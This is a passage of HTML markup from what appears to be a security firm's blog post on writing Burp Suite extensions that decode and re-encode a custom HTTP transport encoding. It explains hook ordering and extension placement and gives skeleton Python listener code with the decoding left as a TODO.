&lt;a id="rest_code_773268b73f2b497380611e55069e938d-45" name="rest_code_773268b73f2b497380611e55069e938d-45" href="https://www.pentagrid.ch/en/blog/teaching_burp_a_new_http_transport_encoding/#rest_code_773268b73f2b497380611e55069e938d-45"&gt;&lt;/a&gt;        &lt;span class="c1"&gt;# TODO: Implement whatever you would like to do&lt;/span&gt;
&lt;a id="rest_code_773268b73f2b497380611e55069e938d-46" name="rest_code_773268b73f2b497380611e55069e938d-46" href="https://www.pentagrid.ch/en/blog/teaching_burp_a_new_http_transport_encoding/#rest_code_773268b73f2b497380611e55069e938d-46"&gt;&lt;/a&gt;        &lt;span class="k"&gt;pass&lt;/span&gt;
&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;As a bonus, the Burp UI will show the "Edited request" or "Edited response" option in the Proxy tool whenever we change a proxy message. However, for &lt;code class="docutils literal"&gt;processHttpMessage&lt;/code&gt; we are partially blind, the request and responses will simply be changed, but depending on where we measure we might see them in a different state in the UI (discussed in the next section).&lt;/p&gt;
&lt;/section&gt;
&lt;section id="burp-s-hooking-locations"&gt;
&lt;h2&gt;Burp's hooking locations&lt;/h2&gt;
&lt;p&gt;We would like to hook as early as possible and as late as possible. We would like to make sure that we decode or decrypt early, so that all other Burp tools can work with readable non-compressed HTTP requests and responses. We also want to encode or encrypt as late as possible, just before the request leaves Burp for the same reason. The problem here is that &lt;code class="docutils literal"&gt;processProxyMessage&lt;/code&gt; is called before &lt;code class="docutils literal"&gt;processHttpMessage&lt;/code&gt; for requests, but for responses &lt;code class="docutils literal"&gt;processHttpMessage&lt;/code&gt; is called before &lt;code class="docutils literal"&gt;processProxyMessage&lt;/code&gt;. When analysing the exact behavior, we saw it's a non-trivial setup. For example, the built-in Burp Logger is a tab in the Burp UI showing all requests/responses that flow through Burp. But the question is, where does the Burp Logger hook the API itself? Moreover, users who have advanced knowledge of Burp also know that the extension order in the loaded extension list matters. So where should we put our decoder or decrypter and where should we put our encoder or encrypter? This is not easy to explain and it took us a little trial and error, but we figured out that this diagram should be accurate:&lt;/p&gt;
&lt;figure class="align-center"&gt;
&lt;a class="reference external image-reference" href="https://www.pentagrid.ch/images/202204_burp_handling_of_messages.png"&gt;
&lt;img alt="Diagram showing how requests and responses are processed inside Burp when we load our Burp extensions. Green is for cleartext (decoded or decrypted) traffic, red for encoded or encrypted traffic." src="https://www.pentagrid.ch/images/202204_burp_handling_of_messages.thumbnail.png"&gt;
&lt;/a&gt;
&lt;figcaption&gt;
&lt;p&gt;Diagram showing how requests and responses are processed inside Burp when we load our Burp extensions. Green is for cleartext (decoded or decrypted) traffic, red for encoded or encrypted traffic.&lt;/p&gt;
&lt;/figcaption&gt;
&lt;/figure&gt;
&lt;p&gt;This diagram shows several interesting details:&lt;/p&gt;
&lt;ul class="simple"&gt;
&lt;li&gt;&lt;p&gt;We achieve what we want: Target, Intruder, Repeater, Scanner and other extensions can deal with "cleartext" requests. However, we can't make it work with Proxy match/replace rules for requests (they are applied to the encoded content).&lt;/p&gt;&lt;/li&gt;
&lt;li&gt;&lt;p&gt;Burp's built-in Logger is not last in the chain for responses, it's possible that Burp extensions modify the responses. This means you don't necessarily see what was delivered to the client/server in Logger. You should better use Logger++ and put it last in the extension list to see which requests are sent to the server and which responses are returned after processing in Burp. Of course it depends on what you want to see, but that's what is the most logical setup.&lt;/p&gt;&lt;/li&gt;
&lt;li&gt;&lt;p&gt;Our extension we would like to write for our purpose has to be first &lt;em&gt;and&lt;/em&gt; last (well, second-last before Logger++) to make sure it does its job well. This means we need to write two extensions, an early-decoder that is first in the list for requests (see DECRYPTER top left in the diagram) and responses (see DECRYPTER bottom right) and a late-reencoder that is last in the list for requests (see ENCRYPTER bottom left) and responses (see ENCRYPTER top right). So the order of the extensions has to be like in the following image:&lt;/p&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;figure class="align-center"&gt;
&lt;a class="reference external image-reference" href="https://www.pentagrid.ch/images/202204_burp_extension_order.png"&gt;
&lt;img alt="Extension order is important to make sure all extensions see the correct traffic. Early decoder as the first extension, late encoder as the second-last." src="https://www.pentagrid.ch/images/202204_burp_extension_order.thumbnail.png"&gt;
&lt;/a&gt;
&lt;figcaption&gt;
&lt;p&gt;Extension order is important to make sure all extensions see the correct traffic. Early decoder as the first extension, late encoder as the second-last.&lt;/p&gt;
&lt;/figcaption&gt;
&lt;/figure&gt;
&lt;p&gt;Now that we know we need two extensions, how would the Python extensions look like? Here's the early decoder:&lt;/p&gt;
&lt;div class="code"&gt;&lt;pre class="code python"&gt;&lt;a id="rest_code_dfe7432a4980464381e3ff25cfac818b-1" name="rest_code_dfe7432a4980464381e3ff25cfac818b-1" href="https://www.pentagrid.ch/en/blog/teaching_burp_a_new_http_transport_encoding/#rest_code_dfe7432a4980464381e3ff25cfac818b-1"&gt;&lt;/a&gt;&lt;span class="kn"&gt;from&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="nn"&gt;burp&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="kn"&gt;import&lt;/span&gt; &lt;span class="n"&gt;IBurpExtender&lt;/span&gt;
&lt;a id="rest_code_dfe7432a4980464381e3ff25cfac818b-2" name="rest_code_dfe7432a4980464381e3ff25cfac818b-2" href="https://www.pentagrid.ch/en/blog/teaching_burp_a_new_http_transport_encoding/#rest_code_dfe7432a4980464381e3ff25cfac818b-2"&gt;&lt;/a&gt;&lt;span class="kn"&gt;from&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="nn"&gt;burp&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="kn"&gt;import&lt;/span&gt; &lt;span class="n"&gt;IHttpListener&lt;/span&gt;
&lt;a id="rest_code_dfe7432a4980464381e3ff25cfac818b-3" name="rest_code_dfe7432a4980464381e3ff25cfac818b-3" href="https://www.pentagrid.ch/en/blog/teaching_burp_a_new_http_transport_encoding/#rest_code_dfe7432a4980464381e3ff25cfac818b-3"&gt;&lt;/a&gt;&lt;span class="kn"&gt;from&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="nn"&gt;burp&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="kn"&gt;import&lt;/span&gt; &lt;span class="n"&gt;IProxyListener&lt;/span&gt;
&lt;a id="rest_code_dfe7432a4980464381e3ff25cfac818b-4" name="rest_code_dfe7432a4980464381e3ff25cfac818b-4" href="https://www.pentagrid.ch/en/blog/teaching_burp_a_new_http_transport_encoding/#rest_code_dfe7432a4980464381e3ff25cfac818b-4"&gt;&lt;/a&gt;&lt;span class="kn"&gt;from&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="nn"&gt;burp&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="kn"&gt;import&lt;/span&gt; &lt;span class="n"&gt;IBurpExtenderCallbacks&lt;/span&gt;
&lt;a id="rest_code_dfe7432a4980464381e3ff25cfac818b-5" name="rest_code_dfe7432a4980464381e3ff25cfac818b-5" href="https://www.pentagrid.ch/en/blog/teaching_burp_a_new_http_transport_encoding/#rest_code_dfe7432a4980464381e3ff25cfac818b-5"&gt;&lt;/a&gt;
&lt;a id="rest_code_dfe7432a4980464381e3ff25cfac818b-6" name="rest_code_dfe7432a4980464381e3ff25cfac818b-6" href="https://www.pentagrid.ch/en/blog/teaching_burp_a_new_http_transport_encoding/#rest_code_dfe7432a4980464381e3ff25cfac818b-6"&gt;&lt;/a&gt;&lt;span class="n"&gt;NAME&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="s2"&gt;"Pentagrid early decoder"&lt;/span&gt;
&lt;a id="rest_code_dfe7432a4980464381e3ff25cfac818b-7" name="rest_code_dfe7432a4980464381e3ff25cfac818b-7" href="https://www.pentagrid.ch/en/blog/teaching_burp_a_new_http_transport_encoding/#rest_code_dfe7432a4980464381e3ff25cfac818b-7"&gt;&lt;/a&gt;
&lt;a id="rest_code_dfe7432a4980464381e3ff25cfac818b-8" name="rest_code_dfe7432a4980464381e3ff25cfac818b-8" href="https://www.pentagrid.ch/en/blog/teaching_burp_a_new_http_transport_encoding/#rest_code_dfe7432a4980464381e3ff25cfac818b-8"&gt;&lt;/a&gt;&lt;span class="k"&gt;class&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="nc"&gt;BurpExtender&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;IBurpExtender&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;IHttpListener&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;IProxyListener&lt;/span&gt;&lt;span class="p"&gt;):&lt;/span&gt;
&lt;a id="rest_code_dfe7432a4980464381e3ff25cfac818b-9" name="rest_code_dfe7432a4980464381e3ff25cfac818b-9" href="https://www.pentagrid.ch/en/blog/teaching_burp_a_new_http_transport_encoding/#rest_code_dfe7432a4980464381e3ff25cfac818b-9"&gt;&lt;/a&gt;
&lt;a id="rest_code_dfe7432a4980464381e3ff25cfac818b-10" name="rest_code_dfe7432a4980464381e3ff25cfac818b-10" href="https://www.pentagrid.ch/en/blog/teaching_burp_a_new_http_transport_encoding/#rest_code_dfe7432a4980464381e3ff25cfac818b-10"&gt;&lt;/a&gt;    &lt;span class="k"&gt;def&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="nf"&gt;registerExtenderCallbacks&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="bp"&gt;self&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;callbacks&lt;/span&gt;&lt;span class="p"&gt;):&lt;/span&gt;
&lt;a id="rest_code_dfe7432a4980464381e3ff25cfac818b-11" name="rest_code_dfe7432a4980464381e3ff25cfac818b-11" href="https://www.pentagrid.ch/en/blog/teaching_burp_a_new_http_transport_encoding/#rest_code_dfe7432a4980464381e3ff25cfac818b-11"&gt;&lt;/a&gt;
&lt;a id="rest_code_dfe7432a4980464381e3ff25cfac818b-12" name="rest_code_dfe7432a4980464381e3ff25cfac818b-12" href="https://www.pentagrid.ch/en/blog/teaching_burp_a_new_http_transport_encoding/#rest_code_dfe7432a4980464381e3ff25cfac818b-12"&gt;&lt;/a&gt;        &lt;span class="c1"&gt;# keep a reference to our callbacks object&lt;/span&gt;
&lt;a id="rest_code_dfe7432a4980464381e3ff25cfac818b-13" name="rest_code_dfe7432a4980464381e3ff25cfac818b-13" href="https://www.pentagrid.ch/en/blog/teaching_burp_a_new_http_transport_encoding/#rest_code_dfe7432a4980464381e3ff25cfac818b-13"&gt;&lt;/a&gt;        &lt;span class="bp"&gt;self&lt;/span&gt;&lt;span class="o"&gt;.&lt;/span&gt;&lt;span class="n"&gt;_callbacks&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;callbacks&lt;/span&gt;
&lt;a id="rest_code_dfe7432a4980464381e3ff25cfac818b-14" name="rest_code_dfe7432a4980464381e3ff25cfac818b-14" href="https://www.pentagrid.ch/en/blog/teaching_burp_a_new_http_transport_encoding/#rest_code_dfe7432a4980464381e3ff25cfac818b-14"&gt;&lt;/a&gt;
&lt;a id="rest_code_dfe7432a4980464381e3ff25cfac818b-15" name="rest_code_dfe7432a4980464381e3ff25cfac818b-15" href="https://www.pentagrid.ch/en/blog/teaching_burp_a_new_http_transport_encoding/#rest_code_dfe7432a4980464381e3ff25cfac818b-15"&gt;&lt;/a&gt;        &lt;span class="c1"&gt;# obtain an extension helpers object&lt;/span&gt;
&lt;a id="rest_code_dfe7432a4980464381e3ff25cfac818b-16" name="rest_code_dfe7432a4980464381e3ff25cfac818b-16" href="https://www.pentagrid.ch/en/blog/teaching_burp_a_new_http_transport_encoding/#rest_code_dfe7432a4980464381e3ff25cfac818b-16"&gt;&lt;/a&gt;        &lt;span class="bp"&gt;self&lt;/span&gt;&lt;span class="o"&gt;.&lt;/span&gt;&lt;span class="n"&gt;_helpers&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;callbacks&lt;/span&gt;&lt;span class="o"&gt;.&lt;/span&gt;&lt;span class="n"&gt;getHelpers&lt;/span&gt;&lt;span class="p"&gt;()&lt;/span&gt;
&lt;a id="rest_code_dfe7432a4980464381e3ff25cfac818b-17" name="rest_code_dfe7432a4980464381e3ff25cfac818b-17" href="https://www.pentagrid.ch/en/blog/teaching_burp_a_new_http_transport_encoding/#rest_code_dfe7432a4980464381e3ff25cfac818b-17"&gt;&lt;/a&gt;
&lt;a id="rest_code_dfe7432a4980464381e3ff25cfac818b-18" name="rest_code_dfe7432a4980464381e3ff25cfac818b-18" href="https://www.pentagrid.ch/en/blog/teaching_burp_a_new_http_transport_encoding/#rest_code_dfe7432a4980464381e3ff25cfac818b-18"&gt;&lt;/a&gt;        &lt;span class="c1"&gt;# set our extension name&lt;/span&gt;
&lt;a id="rest_code_dfe7432a4980464381e3ff25cfac818b-19" name="rest_code_dfe7432a4980464381e3ff25cfac818b-19" href="https://www.pentagrid.ch/en/blog/teaching_burp_a_new_http_transport_encoding/#rest_code_dfe7432a4980464381e3ff25cfac818b-19"&gt;&lt;/a&gt;        &lt;span class="n"&gt;callbacks&lt;/span&gt;&lt;span class="o"&gt;.&lt;/span&gt;&lt;span class="n"&gt;setExtensionName&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;NAME&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;
&lt;a id="rest_code_dfe7432a4980464381e3ff25cfac818b-20" name="rest_code_dfe7432a4980464381e3ff25cfac818b-20" href="https://www.pentagrid.ch/en/blog/teaching_burp_a_new_http_transport_encoding/#rest_code_dfe7432a4980464381e3ff25cfac818b-20"&gt;&lt;/a&gt;
&lt;a id="rest_code_dfe7432a4980464381e3ff25cfac818b-21" name="rest_code_dfe7432a4980464381e3ff25cfac818b-21" href="https://www.pentagrid.ch/en/blog/teaching_burp_a_new_http_transport_encoding/#rest_code_dfe7432a4980464381e3ff25cfac818b-21"&gt;&lt;/a&gt;        &lt;span class="c1"&gt;# register ourselves as an HTTP listener&lt;/span&gt;
&lt;a id="rest_code_dfe7432a4980464381e3ff25cfac818b-22" name="rest_code_dfe7432a4980464381e3ff25cfac818b-22" href="https://www.pentagrid.ch/en/blog/teaching_burp_a_new_http_transport_encoding/#rest_code_dfe7432a4980464381e3ff25cfac818b-22"&gt;&lt;/a&gt;        &lt;span class="n"&gt;callbacks&lt;/span&gt;&lt;span class="o"&gt;.&lt;/span&gt;&lt;span class="n"&gt;registerHttpListener&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="bp"&gt;self&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;
&lt;a id="rest_code_dfe7432a4980464381e3ff25cfac818b-23" name="rest_code_dfe7432a4980464381e3ff25cfac818b-23" href="https://www.pentagrid.ch/en/blog/teaching_burp_a_new_http_transport_encoding/#rest_code_dfe7432a4980464381e3ff25cfac818b-23"&gt;&lt;/a&gt;        &lt;span class="n"&gt;callbacks&lt;/span&gt;&lt;span class="o"&gt;.&lt;/span&gt;&lt;span class="n"&gt;registerProxyListener&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="bp"&gt;self&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;
&lt;a id="rest_code_dfe7432a4980464381e3ff25cfac818b-24" name="rest_code_dfe7432a4980464381e3ff25cfac818b-24" href="https://www.pentagrid.ch/en/blog/teaching_burp_a_new_http_transport_encoding/#rest_code_dfe7432a4980464381e3ff25cfac818b-24"&gt;&lt;/a&gt;
&lt;a id="rest_code_dfe7432a4980464381e3ff25cfac818b-25" name="rest_code_dfe7432a4980464381e3ff25cfac818b-25" href="https://www.pentagrid.ch/en/blog/teaching_burp_a_new_http_transport_encoding/#rest_code_dfe7432a4980464381e3ff25cfac818b-25"&gt;&lt;/a&gt;        &lt;span class="nb"&gt;print&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="s2"&gt;"Loaded "&lt;/span&gt;&lt;span class="o"&gt;+&lt;/span&gt;&lt;span class="n"&gt;NAME&lt;/span&gt;&lt;span class="o"&gt;+&lt;/span&gt;&lt;span class="s2"&gt;" successfully!"&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;
&lt;a id="rest_code_dfe7432a4980464381e3ff25cfac818b-26" name="rest_code_dfe7432a4980464381e3ff25cfac818b-26" href="https://www.pentagrid.ch/en/blog/teaching_burp_a_new_http_transport_encoding/#rest_code_dfe7432a4980464381e3ff25cfac818b-26"&gt;&lt;/a&gt;
&lt;a id="rest_code_dfe7432a4980464381e3ff25cfac818b-27" name="rest_code_dfe7432a4980464381e3ff25cfac818b-27" href="https://www.pentagrid.ch/en/blog/teaching_burp_a_new_http_transport_encoding/#rest_code_dfe7432a4980464381e3ff25cfac818b-27"&gt;&lt;/a&gt;    &lt;span class="c1"&gt;#&lt;/span&gt;
&lt;a id="rest_code_dfe7432a4980464381e3ff25cfac818b-28" name="rest_code_dfe7432a4980464381e3ff25cfac818b-28" href="https://www.pentagrid.ch/en/blog/teaching_burp_a_new_http_transport_encoding/#rest_code_dfe7432a4980464381e3ff25cfac818b-28"&gt;&lt;/a&gt;    &lt;span class="c1"&gt;# implement IHttpListener&lt;/span&gt;
&lt;a id="rest_code_dfe7432a4980464381e3ff25cfac818b-29" name="rest_code_dfe7432a4980464381e3ff25cfac818b-29" href="https://www.pentagrid.ch/en/blog/teaching_burp_a_new_http_transport_encoding/#rest_code_dfe7432a4980464381e3ff25cfac818b-29"&gt;&lt;/a&gt;    &lt;span class="c1"&gt;#&lt;/span&gt;
&lt;a id="rest_code_dfe7432a4980464381e3ff25cfac818b-30" name="rest_code_dfe7432a4980464381e3ff25cfac818b-30" href="https://www.pentagrid.ch/en/blog/teaching_burp_a_new_http_transport_encoding/#rest_code_dfe7432a4980464381e3ff25cfac818b-30"&gt;&lt;/a&gt;
&lt;a id="rest_code_dfe7432a4980464381e3ff25cfac818b-31" name="rest_code_dfe7432a4980464381e3ff25cfac818b-31" href="https://www.pentagrid.ch/en/blog/teaching_burp_a_new_http_transport_encoding/#rest_code_dfe7432a4980464381e3ff25cfac818b-31"&gt;&lt;/a&gt;    &lt;span class="k"&gt;def&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="nf"&gt;processHttpMessage&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="bp"&gt;self&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;toolFlag&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;messageIsRequest&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;messageInfo&lt;/span&gt;&lt;span class="p"&gt;):&lt;/span&gt;
&lt;a id="rest_code_dfe7432a4980464381e3ff25cfac818b-32" name="rest_code_dfe7432a4980464381e3ff25cfac818b-32" href="https://www.pentagrid.ch/en/blog/teaching_burp_a_new_http_transport_encoding/#rest_code_dfe7432a4980464381e3ff25cfac818b-32"&gt;&lt;/a&gt;        &lt;span class="k"&gt;if&lt;/span&gt; &lt;span class="n"&gt;toolFlag&lt;/span&gt; &lt;span class="o"&gt;==&lt;/span&gt; &lt;span class="n"&gt;IBurpExtenderCallbacks&lt;/span&gt;&lt;span class="o"&gt;.&lt;/span&gt;&lt;span class="n"&gt;TOOL_PROXY&lt;/span&gt; &lt;span class="ow"&gt;and&lt;/span&gt; &lt;span class="n"&gt;messageIsRequest&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;
&lt;a id="rest_code_dfe7432a4980464381e3ff25cfac818b-33" name="rest_code_dfe7432a4980464381e3ff25cfac818b-33" href="https://www.pentagrid.ch/en/blog/teaching_burp_a_new_http_transport_encoding/#rest_code_dfe7432a4980464381e3ff25cfac818b-33"&gt;&lt;/a&gt;            &lt;span class="c1"&gt;# Already processed in processProxyMessage&lt;/span&gt;
&lt;a id="rest_code_dfe7432a4980464381e3ff25cfac818b-34" name="rest_code_dfe7432a4980464381e3ff25cfac818b-34" href="https://www.pentagrid.ch/en/blog/teaching_burp_a_new_http_transport_encoding/#rest_code_dfe7432a4980464381e3ff25cfac818b-34"&gt;&lt;/a&gt;            &lt;span class="k"&gt;return&lt;/span&gt;
&lt;a id="rest_code_dfe7432a4980464381e3ff25cfac818b-35" name="rest_code_dfe7432a4980464381e3ff25cfac818b-35" href="https://www.pentagrid.ch/en/blog/teaching_burp_a_new_http_transport_encoding/#rest_code_dfe7432a4980464381e3ff25cfac818b-35"&gt;&lt;/a&gt;        &lt;span class="bp"&gt;self&lt;/span&gt;&lt;span class="o"&gt;.&lt;/span&gt;&lt;span class="n"&gt;filter_message&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;toolFlag&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;messageIsRequest&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;messageInfo&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;
&lt;a id="rest_code_dfe7432a4980464381e3ff25cfac818b-36" name="rest_code_dfe7432a4980464381e3ff25cfac818b-36" href="https://www.pentagrid.ch/en/blog/teaching_burp_a_new_http_transport_encoding/#rest_code_dfe7432a4980464381e3ff25cfac818b-36"&gt;&lt;/a&gt;
&lt;a id="rest_code_dfe7432a4980464381e3ff25cfac818b-37" name="rest_code_dfe7432a4980464381e3ff25cfac818b-37" href="https://www.pentagrid.ch/en/blog/teaching_burp_a_new_http_transport_encoding/#rest_code_dfe7432a4980464381e3ff25cfac818b-37"&gt;&lt;/a&gt;    &lt;span class="c1"&gt;#&lt;/span&gt;
&lt;a id="rest_code_dfe7432a4980464381e3ff25cfac818b-38" name="rest_code_dfe7432a4980464381e3ff25cfac818b-38" href="https://www.pentagrid.ch/en/blog/teaching_burp_a_new_http_transport_encoding/#rest_code_dfe7432a4980464381e3ff25cfac818b-38"&gt;&lt;/a&gt;    &lt;span class="c1"&gt;# implement IProxyListener&lt;/span&gt;
&lt;a id="rest_code_dfe7432a4980464381e3ff25cfac818b-39" name="rest_code_dfe7432a4980464381e3ff25cfac818b-39" href="https://www.pentagrid.ch/en/blog/teaching_burp_a_new_http_transport_encoding/#rest_code_dfe7432a4980464381e3ff25cfac818b-39"&gt;&lt;/a&gt;    &lt;span class="c1"&gt;#&lt;/span&gt;
&lt;a id="rest_code_dfe7432a4980464381e3ff25cfac818b-40" name="rest_code_dfe7432a4980464381e3ff25cfac818b-40" href="https://www.pentagrid.ch/en/blog/teaching_burp_a_new_http_transport_encoding/#rest_code_dfe7432a4980464381e3ff25cfac818b-40"&gt;&lt;/a&gt;    &lt;span class="k"&gt;def&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="nf"&gt;processProxyMessage&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="bp"&gt;self&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;messageIsRequest&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;message&lt;/span&gt;&lt;span class="p"&gt;):&lt;/span&gt;
&lt;a id="rest_code_dfe7432a4980464381e3ff25cfac818b-41" name="rest_code_dfe7432a4980464381e3ff25cfac818b-41" href="https://www.pentagrid.ch/en/blog/teaching_burp_a_new_http_transport_encoding/#rest_code_dfe7432a4980464381e3ff25cfac818b-41"&gt;&lt;/a&gt;        &lt;span class="c1"&gt;# Responses are handled as early as possible in processHttpMessage&lt;/span&gt;
&lt;a id="rest_code_dfe7432a4980464381e3ff25cfac818b-42" name="rest_code_dfe7432a4980464381e3ff25cfac818b-42" href="https://www.pentagrid.ch/en/blog/teaching_burp_a_new_http_transport_encoding/#rest_code_dfe7432a4980464381e3ff25cfac818b-42"&gt;&lt;/a&gt;        &lt;span class="k"&gt;if&lt;/span&gt; &lt;span class="n"&gt;messageIsRequest&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;
&lt;a id="rest_code_dfe7432a4980464381e3ff25cfac818b-43" name="rest_code_dfe7432a4980464381e3ff25cfac818b-43" href="https://www.pentagrid.ch/en/blog/teaching_burp_a_new_http_transport_encoding/#rest_code_dfe7432a4980464381e3ff25cfac818b-43"&gt;&lt;/a&gt;            &lt;span class="bp"&gt;self&lt;/span&gt;&lt;span class="o"&gt;.&lt;/span&gt;&lt;span class="n"&gt;filter_message&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;IBurpExtenderCallbacks&lt;/span&gt;&lt;span class="o"&gt;.&lt;/span&gt;&lt;span class="n"&gt;TOOL_PROXY&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;messageIsRequest&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;message&lt;/span&gt;&lt;span class="o"&gt;.&lt;/span&gt;&lt;span class="n"&gt;getMessageInfo&lt;/span&gt;&lt;span class="p"&gt;())&lt;/span&gt;
&lt;a id="rest_code_dfe7432a4980464381e3ff25cfac818b-44" name="rest_code_dfe7432a4980464381e3ff25cfac818b-44" href="https://www.pentagrid.ch/en/blog/teaching_burp_a_new_http_transport_encoding/#rest_code_dfe7432a4980464381e3ff25cfac818b-44"&gt;&lt;/a&gt;
&lt;a id="rest_code_dfe7432a4980464381e3ff25cfac818b-45" name="rest_code_dfe7432a4980464381e3ff25cfac818b-45" href="https://www.pentagrid.ch/en/blog/teaching_burp_a_new_http_transport_encoding/#rest_code_dfe7432a4980464381e3ff25cfac818b-45"&gt;&lt;/a&gt;
&lt;a id="rest_code_dfe7432a4980464381e3ff25cfac818b-46" name="rest_code_dfe7432a4980464381e3ff25cfac818b-46" href="https://www.pentagrid.ch/en/blog/teaching_burp_a_new_http_transport_encoding/#rest_code_dfe7432a4980464381e3ff25cfac818b-46"&gt;&lt;/a&gt;    &lt;span class="k"&gt;def&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="nf"&gt;filter_message&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="bp"&gt;self&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;toolFlag&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;messageIsRequest&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;messageInfo&lt;/span&gt;&lt;span class="p"&gt;):&lt;/span&gt;
&lt;a id="rest_code_dfe7432a4980464381e3ff25cfac818b-47" name="rest_code_dfe7432a4980464381e3ff25cfac818b-47" href="https://www.pentagrid.ch/en/blog/teaching_burp_a_new_http_transport_encoding/#rest_code_dfe7432a4980464381e3ff25cfac818b-47"&gt;&lt;/a&gt;        &lt;span class="c1"&gt;# TODO: implement decoding&lt;/span&gt;
&lt;a id="rest_code_dfe7432a4980464381e3ff25cfac818b-48" name="rest_code_dfe7432a4980464381e3ff25cfac818b-48" href="https://www.pentagrid.ch/en/blog/teaching_burp_a_new_http_transport_encoding/#rest_code_dfe7432a4980464381e3ff25cfac818b-48"&gt;&lt;/a&gt;        &lt;span class="k"&gt;pass&lt;/span&gt;
&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;And here's the late encoder:&lt;/p&gt;
&lt;div class="code"&gt;&lt;pre class="code python"&gt;&lt;a id="rest_code_a6988cdcaff644c6b73b98e3c1897e6e-1" name="rest_code_a6988cdcaff644c6b73b98e3c1897e6e-1" href="https://www.pentagrid.ch/en/blog/teaching_burp_a_new_http_transport_encoding/#rest_code_a6988cdcaff644c6b73b98e3c1897e6e-1"&gt;&lt;/a&gt;&lt;span class="kn"&gt;from&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="nn"&gt;burp&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="kn"&gt;import&lt;/span&gt; &lt;span class="n"&gt;IBurpExtender&lt;/span&gt;
&lt;a id="rest_code_a6988cdcaff644c6b73b98e3c1897e6e-2" name="rest_code_a6988cdcaff644c6b73b98e3c1897e6e-2" href="https://www.pentagrid.ch/en/blog/teaching_burp_a_new_http_transport_encoding/#rest_code_a6988cdcaff644c6b73b98e3c1897e6e-2"&gt;&lt;/a&gt;&lt;span class="kn"&gt;from&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="nn"&gt;burp&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="kn"&gt;import&lt;/span&gt; &lt;span class="n"&gt;IHttpListener&lt;/span&gt;
&lt;a id="rest_code_a6988cdcaff644c6b73b98e3c1897e6e-3" name="rest_code_a6988cdcaff644c6b73b98e3c1897e6e-3" href="https://www.pentagrid.ch/en/blog/teaching_burp_a_new_http_transport_encoding/#rest_code_a6988cdcaff644c6b73b98e3c1897e6e-3"&gt;&lt;/a&gt;&lt;span class="kn"&gt;from&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="nn"&gt;burp&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="kn"&gt;import&lt;/span&gt; &lt;span class="n"&gt;IProxyListener&lt;/span&gt;
